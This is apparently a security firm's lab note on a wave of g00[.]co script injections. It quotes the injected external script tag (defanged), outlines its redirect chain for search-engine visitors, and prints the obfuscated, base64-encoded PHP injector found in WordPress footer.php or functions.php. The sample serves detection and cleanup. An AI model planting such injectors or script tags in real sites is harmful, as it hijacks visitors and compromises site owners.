New Wave of g00 Script Injections

Labs Note

Once active during the past summer, the g00[.]co script injections come with a new wave on infections this November.

The most common variation is

<script src="hxxp: / / g00[.]co/BtFVPd"></script>

This short URL hides the hxxp://yourjavascript[.]com/3921156982/not.js script, which in turn opens hxxp://speedclick[.]info/app/amung.php?c=a&s= for visitors that come from Facebook, Google, Bing and Yahoo!

On the server side, the malware is mainly injected into WordPress theme files. Usually you can find the following PHP code (in one line. Line breaks added for readability) in either footer.php or functions.php:

if (strpos($_SERVER[base64_decode("UkVRVUVTVF9VUkk=")],
base64_decode("d3AtYWRtaW4=")) === false) 
echo base64_decode(base64_decode(base64_decode("VUVoT2Ft...skipped...edUFEwSw0K")));

It injects that g00 script into all site URLs that don’t contain wp-admin.

As always, if you need site security monitoring and cleanup services, you can count on us.

You May Also Like